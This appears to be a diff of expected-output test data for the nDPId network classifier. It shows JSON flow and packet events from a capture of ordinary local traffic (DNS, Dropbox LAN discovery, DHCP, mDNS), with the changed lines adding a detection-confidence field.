 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1588779600828,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1588779600828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABGiX4AAP8RronAqAFNwKgBAfC\/ADUAMkhio9MBAAABAAAAAAAABWU3MDQ3A2UxMgpha2FtYWllZGdlA25ldAAAAQAB"}
-00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779600828,"flow_last_seen":1588779600828,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"ts_msec":1588779600828,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1588779600838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"ts_msec":1588779600838,"pkt":"jP5XIzfkKDc3AG3ICABFAAEyb04AAP8Rx4PAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="}
 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1588779600842,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":100,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":100,"pkt_l4_len":66,"ts_msec":1588779600842,"pkt":"KDc3AG3IEBMx8Tl2CABFAABWE2lAADkRqo\/AqAEBwKgBTQA18L8AQgAAo9OBgAABAAEAAAAABWU3MDQ3A2UxMgpha2FtYWllZGdlA25ldAAAAQABwAwAAQABAAAAFAAEXHr3XA=="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779600842,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.247.92"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":41,"source":"telegram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779600828,"flow_last_seen":1588779600842,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1588779600842,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":61631,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e7047.e12.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.247.92"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01062{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1588779601222,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1588779601222,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHsBFEAAEARsrvAqAFN\/\/\/\/\/0RcRFwB2FvpeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"telegram.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601222,"flow_last_seen":1588779601222,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779601222,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01059{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1588779601223,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":506,"pkt_l4_len":472,"ts_msec":1588779601223,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAHskFkAAEARZAvAqAFNwKgB\/0RcRFwB2JlBeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiA0MDk1NjMzNTA1MDQ3NDIyMDI0ODQ4MjA1NjAzMDgyNTQwNDYyOSwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzUzMDMzMDEyNDgsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAyNzUwMzcwNTYwLCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"telegram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779601223,"flow_last_seen":1588779601223,"flow_idle_time":180000,"flow_min_l4_payload_len":464,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1588779601223,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588779601447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1588779601447,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJZAAEARYHvAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGAM98X0EAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1588779603292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":181,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":181,"pkt_l4_len":147,"ts_msec":1588779603292,"pkt":"AQBeAAD7wJrQLWJ0CABFAACnQj4AAP8R1i7AqAE14AAA+xTpFOkAk34YAAAAAAAFAAAAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAyAAQ9fY29tcGFuaW9uLWxpbmvAFQAMgAEFX3Jhb3DAFQAMgAEIX2FpcnBsYXnAFQAMgAEMX3NsZWVwLXByb3h5BF91ZHDAGgAMgAEAACkFoAAAEZQAEgAEAA4AMeKa0C1idMCa0C1idA=="}
-00655{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779603292,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"ts_msec":1588779603292,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
+00681{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779603292,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":92,"midstream":0,"ts_msec":1588779603292,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00646{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1588779603292,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":201,"pkt_l4_len":147,"ts_msec":1588779603292,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAJMR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QCTHG8AAAAAAAUAAAAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADIABD19jb21wYW5pb24tbGlua8AVAAyAAQVfcmFvcMAVAAyAAQhfYWlycGxhecAVAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAaAAyAAQAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"}
-00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
+00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603292,"flow_last_seen":1588779603292,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1588779603292,"l3_proto":"ip6","src_ip":"fe80::18a0:a412:8935:c01b","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_homekit._tcp.local"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1588779603320,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"ts_msec":1588779603320,"pkt":"wJrQLWJ0KDc3AG3ICABFAAEyUGUAAP8R5oLAqAFNwKgBNRTpFOkBHhkkAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="}
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
+00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":180000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1588779603320,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_companion-link._tcp.local"}}
 00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1588779604297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"ts_msec":1588779604297,"pkt":"AQBeAAD7wJrQLWJ0CABFAADgDXQAAP8RCsDAqAE14AAA+xTpFOkAzL4AAAAAAAADAAMAAAABCF9ob21la2l0BF90Y3AFbG9jYWwAAAwAAQ9fY29tcGFuaW9uLWxpbmvAFQAMAAEMX3NsZWVwLXByb3h5BF91ZHDAGgAMAAHAJQAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AlwCUADAABAAARlAAOC0x1Y2EncyBpUGFkwCXAOwAMAAEAABGUABIPNTAtMzUtMTAtNzAuMSAxwDsAACkFoAAAEZQAEgAEAA4AMeKa0C1idMCa0C1idA=="}
 00722{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"telegram.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1588779604297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":258,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":258,"pkt_l4_len":204,"ts_msec":1588779604297,"pkt":"MzMAAAD7wJrQLWJ0ht1gBqDxAMwR\/\/6AAAAAAAAAGKCkEok1wBv\/AgAAAAAAAAAAAAAAAAD7FOkU6QDMXFcAAAAAAAMAAwAAAAEIX2hvbWVraXQEX3RjcAVsb2NhbAAADAABD19jb21wYW5pb24tbGlua8AVAAwAAQxfc2xlZXAtcHJveHkEX3VkcMAaAAwAAcAlAAwAAQAAEZQAEA1MdWNh4oCZcyBpTWFjwCXAJQAMAAEAABGUAA4LTHVjYSdzIGlQYWTAJcA7AAwAAQAAEZQAEg81MC0zNS0xMC03MC4xIDHAOwAAKQWgAAARlAASAAQADgAx4prQLWJ0wJrQLWJ0"}
 00803{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1588779604398,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":320,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":320,"pkt_l4_len":286,"ts_msec":1588779604398,"pkt":"jP5XIzfkKDc3AG3ICABFAAEy\/rUAAP8ROBzAqAFNwKgBSxTpFOkBHhkOAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABANTHVjYeKAmXMgaU1hY8AMwDIAIYABAAAAeAATAAAAAMAFCkx1Y2FzLWlNYWPAIcAyABCAAQAAEZQAWBZycEJBPTM5OjJBOjg4OkFDOjQxOkFCCnJwVnI9MTUyLjERcnBIST1mOWM0NmM2ZGQwN2QRcnBITj0zYzVkYzVjZTk1NzgRcnBIQT04Y2E4Y2I3MzFjMWMNTHVjYeKAmXMgaU1hYwxfZGV2aWNlLWluZm\/AHAAQAAEAABGUABoObW9kZWw9aU1hYzExLDMKb3N4dmVycz0xN8BUAAGAAQAAAHgABMCoAU0="}
 00815{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"telegram.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588779606465,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"ts_msec":1588779606465,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzGJdAAEARYHrAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGABAmSTUAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"}
-00661{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1588779596464,"flow_last_seen":1588779607307,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1588779607307,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}}
+00687{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1588779596464,"flow_last_seen":1588779607307,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1588779607307,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_sleep-proxy._udp.local"}}
